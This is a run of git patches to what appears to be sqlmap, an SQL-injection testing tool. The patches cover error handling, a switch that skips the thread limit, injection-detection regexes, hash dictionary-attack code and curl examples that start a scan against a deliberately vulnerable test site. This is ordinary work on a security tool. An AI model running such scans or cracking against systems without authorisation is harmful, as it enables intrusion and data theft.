 from lib.core.settings import UNICODE_ENCODING
 
 class Wordlist(object):
@@ -21,6 +22,7 @@ class Wordlist(object):
         self.fp = None
         self.index = 0
         self.counter = -1
+        self.current = None
         self.iter = None
         self.custom = custom or []
         self.proc_id = proc_id
@@ -37,15 +39,15 @@ class Wordlist(object):
         elif self.index == len(self.filenames):
             self.iter = iter(self.custom)
         else:
-            current = self.filenames[self.index]
-            if os.path.splitext(current)[1].lower() == ".zip":
-                _ = zipfile.ZipFile(current, 'r')
+            self.current = self.filenames[self.index]
+            if os.path.splitext(self.current)[1].lower() == ".zip":
+                _ = zipfile.ZipFile(self.current, 'r')
                 if len(_.namelist()) == 0:
-                    errMsg = "no file(s) inside '%s'" % current
+                    errMsg = "no file(s) inside '%s'" % self.current
                     raise SqlmapDataException(errMsg)
                 self.fp = _.open(_.namelist()[0])
             else:
-                self.fp = open(current, 'r')
+                self.fp = open(self.current, 'r')
             self.iter = iter(self.fp)
 
         self.index += 1
@@ -61,6 +63,11 @@ class Wordlist(object):
             self.counter += 1
             try:
                 retVal = self.iter.next().rstrip()
+            except zipfile.error, ex:
+                errMsg = "something seems to be wrong with "
+                errMsg += "the file '%s' ('%s'). Please make " % (self.current, ex)
+                errMsg += "sure that you haven't made any changes to it"
+                raise SqlmapInstallationException, errMsg
             except StopIteration:
                 self.adjust()
                 retVal = self.iter.next().rstrip()

From 6cb76bcf85c34499fd3a631c26688940a8b8ff59 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 19 Dec 2014 15:48:54 +0100
Subject: [PATCH 246/492] Adding one new smart ass warning message

---
 lib/core/option.py | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/lib/core/option.py b/lib/core/option.py
index 05ed7c0df..a27175c43 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -986,6 +986,11 @@ def _setTamperingFunctions():
                 errMsg += "in tamper script '%s'" % tfile
                 raise SqlmapGenericException(errMsg)
 
+        if kb.tamperFunctions and len(kb.tamperFunctions) > 3:
+            warnMsg = "using too many tamper scripts is usually not "
+            warnMsg += "a good idea"
+            logger.warning(warnMsg)
+
         if resolve_priorities and priorities:
             priorities.sort(reverse=True)
             kb.tamperFunctions = []

From 4f122ee0086a43108d0fca7191914b8649795fef Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 20 Dec 2014 00:23:31 +0100
Subject: [PATCH 247/492] Bug fix regarding a problem reported by user
 @blink2014

---
 lib/core/agent.py    | 4 +++-
 lib/core/common.py   | 3 +--
 lib/core/settings.py | 2 +-
 xml/errors.xml       | 1 +
 4 files changed, 6 insertions(+), 4 deletions(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 4c35c9152..83d720678 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -162,6 +162,7 @@ class Agent(object):
                 match = None
                 for match in re.finditer(pattern, string):
                     pass
+
                 if match:
                     while True:
                         _ = re.search(r"\\g<([^>]+)>", repl)
@@ -173,7 +174,8 @@ class Agent(object):
                 return retVal
 
             if origValue:
-                retVal = _(r"(\A|\b)%s=%s(\Z|\b)" % (re.escape(parameter), re.escape(origValue)), "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+                regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
+                retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
             else:
                 retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
             if retVal == paramString and urlencode(parameter) != parameter:
diff --git a/lib/core/common.py b/lib/core/common.py
index c3951b33b..264452e0d 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -97,7 +97,6 @@ from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import DEFAULT_MSSQL_SCHEMA
 from lib.core.settings import DESCRIPTION
-from lib.core.settings import DUMMY_SQL_INJECTION_CHARS
 from lib.core.settings import DUMMY_USER_INJECTION
 from lib.core.settings import DYNAMICITY_MARK_LENGTH
 from lib.core.settings import ERROR_PARSING_REGEXES
@@ -573,7 +572,7 @@ def paramToDict(place, parameters=None):
                 testableParameters[parameter] = "=".join(parts[1:])
                 if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken):
                     _ = urldecode(testableParameters[parameter], convall=True)
-                    if (_.strip(DUMMY_SQL_INJECTION_CHARS) != _\
+                    if (_.endswith("'") and _.count("'") == 1
                       or re.search(r'\A9{3,}', _) or re.search(DUMMY_USER_INJECTION, _))\
                       and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX):
                         warnMsg = "it appears that you have provided tainted parameter values "
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 002bec0ad..5adfade0a 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -412,7 +412,7 @@ ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
 DUMMY_SQL_INJECTION_CHARS = ";()'"
 
 # Simple check against dummy users
-DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\A-\d+\Z"
+DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
 
 # Extensions skipped by crawler
 CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx")
diff --git a/xml/errors.xml b/xml/errors.xml
index 498a234de..c1530e27c 100644
--- a/xml/errors.xml
+++ b/xml/errors.xml
@@ -5,6 +5,7 @@
     <dbms value="MySQL">
         <error regexp="SQL syntax.*MySQL"/>
         <error regexp="Warning.*mysql_.*"/>
+        <error regexp="MySqlException \(0x"/>
         <error regexp="valid MySQL result"/>
         <error regexp="MySqlClient\."/>
         <error regexp="com\.mysql\.jdbc\.exceptions"/>

From 76f79ece133db6eb9d79268b77a674f132447e47 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 21 Dec 2014 05:15:42 +0100
Subject: [PATCH 248/492] run like --threads=20! will skip the maximum number
 of threads check

---
 lib/core/option.py   |  2 +-
 lib/core/threads.py  | 19 ++++++++++++-------
 lib/parse/cmdline.py |  4 ++++
 3 files changed, 17 insertions(+), 8 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index a27175c43..c04e6d3fe 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -2190,7 +2190,7 @@ def _basicOptionValidation():
         errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'"
         raise SqlmapSyntaxException(errMsg)
 
-    if conf.threads > MAX_NUMBER_OF_THREADS:
+    if conf.threads > MAX_NUMBER_OF_THREADS and not conf.get("skipThreadCheck"):
         errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
         raise SqlmapSyntaxException(errMsg)
 
diff --git a/lib/core/threads.py b/lib/core/threads.py
index 2b4ce4eb4..0d4e36e05 100644
--- a/lib/core/threads.py
+++ b/lib/core/threads.py
@@ -110,13 +110,18 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
         while True:
             message = "please enter number of threads? [Enter for %d (current)] " % numThreads
             choice = readInput(message, default=str(numThreads))
-            if choice and choice.isdigit():
-                if int(choice) > MAX_NUMBER_OF_THREADS:
-                    errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
-                    logger.critical(errMsg)
-                else:
-                    conf.threads = numThreads = int(choice)
-                    break
+            if choice:
+                skipThreadCheck = False
+                if choice.endswith('!'):
+                    choice = choice[:-1]
+                    skipThreadCheck = True
+                if choice.isdigit():
+                    if int(choice) > MAX_NUMBER_OF_THREADS and not skipThreadCheck:
+                        errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
+                        logger.critical(errMsg)
+                    else:
+                        conf.threads = numThreads = int(choice)
+                        break
 
         if numThreads == 1:
             warnMsg = "running in a single-thread mode. This could take a while"
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index f63909544..826314c70 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
 """
 
 import os
+import re
 import shlex
 import sys
 
@@ -850,6 +851,9 @@ def cmdLineParser():
         for i in xrange(len(argv)):
             if argv[i] == "-hh":
                 argv[i] = "-h"
+            elif re.match(r"\A\d+!\Z", argv[i]) and argv[max(0, i - 1)] == "--threads" or re.match(r"\A--threads.+\d+!\Z", argv[i]):
+                argv[i] = argv[i][:-1]
+                conf.skipThreadCheck = True
             elif argv[i] == "--version":
                 print VERSION_STRING.split('/')[-1]
                 raise SystemExit

From 3056fd476566366ce6dcfbcf41c09ed7be643e32 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 22 Dec 2014 05:56:48 +0100
Subject: [PATCH 249/492] Fix for an Issue #1055

---
 plugins/dbms/mssqlserver/enumeration.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py
index d89d452e6..57a6ef7fb 100644
--- a/plugins/dbms/mssqlserver/enumeration.py
+++ b/plugins/dbms/mssqlserver/enumeration.py
@@ -105,7 +105,7 @@ class Enumeration(GenericEnumeration):
 
                 if not isNoneValue(value):
                     value = filter(None, arrayizeValue(value))
-                    value = [safeSQLIdentificatorNaming(_, True) for _ in value]
+                    value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value]
                     kb.data.cachedTables[db] = value
 
         if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct:

From fc7dd2a9b9484b14a14a86b0ca0593eb94e5b030 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 22 Dec 2014 06:02:39 +0100
Subject: [PATCH 250/492] Patch for an Issue #1056

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 264452e0d..a7648cb71 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -565,7 +565,7 @@ def paramToDict(place, parameters=None):
                 parts[-1] = parts[-1].rstrip()
 
             condition = not conf.testParameter
-            condition |= parameter in conf.testParameter
+            condition |= conf.testParameter is not None and parameter in conf.testParameter
             condition |= place == PLACE.COOKIE and len(intersect((PLACE.COOKIE,), conf.testParameter, True)) > 0
 
             if condition:

From f93bca456490eaaae7f6c1f7ad4fef458add886b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 23 Dec 2014 08:23:40 +0100
Subject: [PATCH 251/492] Patch for an Issue #1058

---
 lib/core/common.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/lib/core/common.py b/lib/core/common.py
index a7648cb71..be9260d46 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2511,6 +2511,9 @@ def findDynamicContent(firstPage, secondPage):
     are dynamic, proper markings will be made
     """
 
+    if not firstPage or not secondPage:
+        return
+
     infoMsg = "searching for dynamic content"
     logger.info(infoMsg)
 

From 59a34073226d317c8d02e60ee13ac1e7a84cb41c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 23 Dec 2014 08:36:00 +0100
Subject: [PATCH 252/492] Patch for an Issue #1057

---
 lib/core/bigarray.py | 18 ++++++++++++++----
 1 file changed, 14 insertions(+), 4 deletions(-)

diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index f9bb76efb..22db383df 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -52,8 +52,13 @@ class BigArray(list):
     def pop(self):
         if len(self.chunks[-1]) < 1:
             self.chunks.pop()
-            with open(self.chunks[-1], "rb") as fp:
-                self.chunks[-1] = pickle.load(fp)
+            try:
+                with open(self.chunks[-1], "rb") as fp:
+                    self.chunks[-1] = pickle.load(fp)
+            except IOError, ex:
+                errMsg = "exception occurred while retrieving data "
+                errMsg += "from a temporary file ('%s')" % ex
+                raise SqlmapSystemException, errMsg
         return self.chunks[-1].pop()
 
     def index(self, value):
@@ -80,8 +85,13 @@ class BigArray(list):
             filename = self._dump(self.cache.data)
             self.chunks[self.cache.index] = filename
         if not (self.cache and self.cache.index == index):
-            with open(self.chunks[index], "rb") as fp:
-                self.cache = Cache(index, pickle.load(fp), False)
+            try:
+                with open(self.chunks[index], "rb") as fp:
+                    self.cache = Cache(index, pickle.load(fp), False)
+            except IOError, ex:
+                errMsg = "exception occurred while retrieving data "
+                errMsg += "from a temporary file ('%s')" % ex
+                raise SqlmapSystemException, errMsg
 
     def __getstate__(self):
         return self.chunks, self.filenames

From 3c23d616e776402f5382dc827ccd140dfcd5976b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 23 Dec 2014 09:01:29 +0100
Subject: [PATCH 253/492] Adding a more user friendly (copy-pastable) client
 example for sqlmapapi client

---
 lib/utils/api.py | 36 ++++--------------------------------
 1 file changed, 4 insertions(+), 32 deletions(-)

diff --git a/lib/utils/api.py b/lib/utils/api.py
index 78a1f1a31..b79159472 100644
--- a/lib/utils/api.py
+++ b/lib/utils/api.py
@@ -103,7 +103,6 @@ class Database(object):
 class Task(object):
     def __init__(self, taskid):
         self.process = None
-        self.temporary_directory = False
         self.output_directory = None
         self.options = None
         self._original_options = None
@@ -143,26 +142,6 @@ class Task(object):
     def reset_options(self):
         self.options = AttribDict(self._original_options)
 
-    def set_output_directory(self):
-        if self.get_option("outputDir"):
-            if os.path.isdir(self.get_option("outputDir")):
-                self.output_directory = self.get_option("outputDir")
-            else:
-                try:
-                    os.makedirs(self.get_option("outputDir"))
-                    self.output_directory = self.get_option("outputDir")
-                except OSError:
-                    pass
-
-        if not self.output_directory or not os.path.isdir(self.output_directory):
-            self.output_directory = tempfile.mkdtemp(prefix="sqlmapoutput-")
-            self.temporary_directory = True
-            self.set_option("outputDir", self.output_directory)
-
-    def clean_filesystem(self):
-        if self.output_directory and self.temporary_directory:
-            shutil.rmtree(self.output_directory)
-
     def engine_start(self):
         self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)],
                              shell=False, stdin=PIPE, close_fds=False)
@@ -354,7 +333,6 @@ def task_delete(taskid):
     Delete own task ID
     """
     if taskid in DataStore.tasks:
-        DataStore.tasks[taskid].clean_filesystem()
         DataStore.tasks.pop(taskid)
 
         logger.debug("[%s] Deleted task" % taskid)
@@ -388,9 +366,6 @@ def task_flush(taskid):
     Flush task spool (delete all tasks)
     """
     if is_admin(taskid):
-        for task in DataStore.tasks:
-            DataStore.tasks[task].clean_filesystem()
-
         DataStore.tasks = dict()
         logger.debug("[%s] Flushed task pool" % taskid)
         return jsonize({"success": True})
@@ -466,9 +441,6 @@ def scan_start(taskid):
     for option, value in request.json.items():
         DataStore.tasks[taskid].set_option(option, value)
 
-    # Overwrite output directory value to a temporary directory
-    DataStore.tasks[taskid].set_output_directory()
-
     # Launch sqlmap engine in a separate process
     DataStore.tasks[taskid].engine_start()
 
@@ -663,9 +635,9 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT):
 
     # TODO: write a simple client with requests, for now use curl from command line
     logger.error("Not yet implemented, use curl from command line instead for now, for example:")
-    print "\n\t$ curl http://%s:%d/task/new" % (host, port)
+    print "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port)
     print ("\t$ curl -H \"Content-Type: application/json\" "
            "-X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' "
-           "http://%s:%d/scan/:taskid/start") % (host, port)
-    print "\t$ curl http://%s:%d/scan/:taskid/data" % (host, port)
-    print "\t$ curl http://%s:%d/scan/:taskid/log\n" % (host, port)
+           "http://%s:%d/scan/$taskid/start") % (host, port)
+    print "\t$ curl http://%s:%d/scan/$taskid/data" % (host, port)
+    print "\t$ curl http://%s:%d/scan/$taskid/log\n" % (host, port)

From 483158c3715ed17e9a4ccccb63fabde6d75587d7 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 23 Dec 2014 09:07:33 +0100
Subject: [PATCH 254/492] Minor style update

---
 lib/utils/api.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/utils/api.py b/lib/utils/api.py
index b79159472..5ff22432d 100644
--- a/lib/utils/api.py
+++ b/lib/utils/api.py
@@ -323,7 +323,7 @@ def task_new():
     taskid = hexencode(os.urandom(8))
     DataStore.tasks[taskid] = Task(taskid)
 
-    logger.debug(" [%s] Created new task" % taskid)
+    logger.debug("Created new task: '%s'" % taskid)
     return jsonize({"success": True, "taskid": taskid})
 
 

From 45886cb9ca18eef565dda324c5ad19d4618dd23d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 23 Dec 2014 22:04:23 +0100
Subject: [PATCH 255/492] Patch for an Issue #1060

---
 lib/core/target.py | 24 +++++++++++++++++++++---
 1 file changed, 21 insertions(+), 3 deletions(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index 2187a0cf5..6a37b7d54 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -40,6 +40,7 @@ from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapMissingPrivileges
 from lib.core.exception import SqlmapSyntaxException
+from lib.core.exception import SqlmapSystemException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.option import _setDBMS
 from lib.core.option import _setKnowledgeBaseAttributes
@@ -498,7 +499,22 @@ def _setResultsFile():
 
     if not conf.resultsFP:
         conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
-        conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
+        try:
+            conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
+        except (OSError, IOError), ex:
+            try:
+                warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex))
+                conf.resultsFilename = tempfile.mkstemp(prefix="sqlmapresults-", suffix=".csv")[1]
+                conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
+                warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename
+                logger.warn(warnMsg)
+            except IOError, _:
+                errMsg = "unable to write to the temporary directory ('%s'). " % _
+                errMsg += "Please make sure that your disk is not full and "
+                errMsg += "that you have sufficient write permissions to "
+                errMsg += "create temporary files and/or directories"
+                raise SqlmapSystemException(errMsg)
+
         conf.resultsFP.writelines("Target URL,Place,Parameter,Techniques%s" % os.linesep)
 
         logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename)
@@ -574,7 +590,8 @@ def _createTargetDirs():
                 errMsg += "Please make sure that your disk is not full and "
                 errMsg += "that you have sufficient write permissions to "
                 errMsg += "create temporary files and/or directories"
-                raise SqlmapGenericException(errMsg)
+                raise SqlmapSystemException(errMsg)
+
             warnMsg = "unable to create regular output directory "
             warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex))
             warnMsg += "Using temporary directory '%s' instead" % tempDir
@@ -595,7 +612,8 @@ def _createTargetDirs():
                 errMsg += "Please make sure that your disk is not full and "
                 errMsg += "that you have sufficient write permissions to "
                 errMsg += "create temporary files and/or directories"
-                raise SqlmapGenericException(errMsg)
+                raise SqlmapSystemException(errMsg)
+
             warnMsg = "unable to create output directory "
             warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
             warnMsg += "Using temporary directory '%s' instead" % tempDir

From bc91884c4d79090c2c0ffed334d8e31e61b40333 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 25 Dec 2014 23:05:34 +0100
Subject: [PATCH 256/492] Fix for an Issue #1065

---
 lib/utils/hash.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index 91aba6827..f8a8c45a2 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -638,7 +638,7 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found
                         rotator = 0
                     status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator])
 
-                    if not user.startswith(DUMMY_USER_PREFIX):
+                    if user and not user.startswith(DUMMY_USER_PREFIX):
                         status += ' (user: %s)' % user
 
                     if not hasattr(conf, "api"):

From 1e014de6be1c77991717496bb077f586aa9851c7 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 26 Dec 2014 22:24:28 +0100
Subject: [PATCH 257/492] Patch for an Issue #1066

---
 lib/request/comparison.py | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)

diff --git a/lib/request/comparison.py b/lib/request/comparison.py
index 0be79635e..f86c82e55 100644
--- a/lib/request/comparison.py
+++ b/lib/request/comparison.py
@@ -135,10 +135,16 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
         while True:
             try:
                 seqMatcher.set_seq1(seq1)
+            except MemoryError:
+                seq1 = seq1[:len(seq1) / 1024]
+            else:
+                break
+
+        while True:
+            try:
                 seqMatcher.set_seq2(seq2)
             except MemoryError:
-                seq1 = seq1[:len(seq1) / 4]
-                seq2 = seq2[:len(seq2) / 4]
+                seq2 = seq2[:len(seq2) / 1024]
             else:
                 break
 

From 02d20ccd13afc378a169f309ef92720264756718 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 30 Dec 2014 08:48:50 +0000
Subject: [PATCH 258/492] Patch for an Issue #1078

---
 lib/core/option.py | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index c04e6d3fe..2db7d3d78 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1079,7 +1079,12 @@ def _setHTTPProxy():
     debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests"
     logger.debug(debugMsg)
 
-    _ = urlparse.urlsplit(conf.proxy)
+    try:
+        _ = urlparse.urlsplit(conf.proxy)
+    except Exception, ex:
+        errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, ex)
+        raise SqlmapSyntaxException, errMsg
+
     hostnamePort = _.netloc.split(":")
 
     scheme = _.scheme.upper()

From e2edebd4067556b4d50d04ec8ba173dd1a7048f0 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 30 Dec 2014 09:04:41 +0000
Subject: [PATCH 259/492] Patch for an Issue #1069

---
 plugins/generic/databases.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py
index 7d5151263..7ced5bc41 100644
--- a/plugins/generic/databases.py
+++ b/plugins/generic/databases.py
@@ -772,6 +772,9 @@ class Databases:
         return kb.data.cachedColumns
 
     def _tableGetCount(self, db, table):
+        if not db or not table:
+            return None
+
         if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
             db = db.upper()
             table = table.upper()

From e383df8e2943ead13babbe7e1f39fb7198fb3903 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 30 Dec 2014 09:16:50 +0000
Subject: [PATCH 260/492] Patch for an Issue #1073

---
 lib/core/settings.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index 5adfade0a..311744bf4 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -517,7 +517,7 @@ MAX_DNS_LABEL = 63
 DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
 
 # Alphabet used for heuristic checks
-HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', '[', ']', ',', '.')
+HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
 
 # String used for dummy XSS check of a tested parameter value
 DUMMY_XSS_CHECK_APPENDIX = "<'\">"

From 4f602daa5b8bbbf06e8641d10ffb1d1c23dd741a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 30 Dec 2014 09:35:56 +0000
Subject: [PATCH 261/492] Minor patch

---
 lib/utils/hash.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index f8a8c45a2..1ac545718 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -769,9 +769,9 @@ def dictionaryAttack(attack_dict):
 
                     kb.wordlists = dictPaths
 
-                except SqlmapFilePathException, msg:
+                except Exception, ex:
                     warnMsg = "there was a problem while loading dictionaries"
-                    warnMsg += " ('%s')" % msg
+                    warnMsg += " ('%s')" % ex
                     logger.critical(warnMsg)
 
             message = "do you want to use common password suffixes? (slow!) [y/N] "

From d3c6cf193231f8a04b13c53d52d7d37b17b2e94c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 30 Dec 2014 14:14:47 +0000
Subject: [PATCH 262/492] Patch for an Issue #1079

---
 lib/core/option.py | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/lib/core/option.py b/lib/core/option.py
index 2db7d3d78..fd3a8c21b 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -2187,6 +2187,13 @@ def _basicOptionValidation():
         errMsg = "option '--regexp' is incompatible with switch '--null-connection'"
         raise SqlmapSyntaxException(errMsg)
 
+    if conf.regexp:
+        try:
+            re.compile(conf.regexp)
+        except re.error, ex:
+            errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, ex)
+            raise SqlmapSyntaxException(errMsg)
+
     if conf.dumpTable and conf.dumpAll:
         errMsg = "switch '--dump' is incompatible with switch '--dump-all'"
         raise SqlmapSyntaxException(errMsg)

From 41c2f889b2ce55f37faf617497d32083682ab835 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 30 Dec 2014 15:44:55 +0100
Subject: [PATCH 263/492] Fix related to the SSLv3 disabling

---
 lib/request/httpshandler.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py
index 67a2daea9..47f09acb9 100644
--- a/lib/request/httpshandler.py
+++ b/lib/request/httpshandler.py
@@ -53,7 +53,7 @@ class HTTPSConnection(httplib.HTTPSConnection):
                     break
                 else:
                     sock.close()
-            except ssl.SSLError, errMsg:
+            except (ssl.SSLError, socket.error), errMsg:
                 logger.debug("SSL connection error occurred ('%s')" % errMsg)
 
         if not success:

From 33508e3bae9d34b4dc9046f6785f68a51a936ec1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 30 Dec 2014 16:11:33 +0100
Subject: [PATCH 264/492] Patch for an Issue #1077

---
 lib/utils/hash.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index 1ac545718..ee3326ec9 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -665,7 +665,7 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found
 
 def dictionaryAttack(attack_dict):
     suffix_list = [""]
-    custom_wordlist = []
+    custom_wordlist = [""]
     hash_regexes = []
     results = []
     resumes = []

From 2985050fced89f566079ab60341b0bde40bb0367 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 30 Dec 2014 16:07:08 +0000
Subject: [PATCH 265/492] Minor patch

---
 lib/core/common.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/core/common.py b/lib/core/common.py
index be9260d46..b90c81872 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2928,6 +2928,7 @@ def createGithubIssue(errMsg, excMsg):
     _ = re.sub(r"'[^']+'", "''", excMsg)
     _ = re.sub(r"\s+line \d+", "", _)
     _ = re.sub(r'File ".+?/(\w+\.py)', "\g<1>", _)
+    _ = re.sub(r".+\Z", "", _)
     key = hashlib.md5(_).hexdigest()[:8]
 
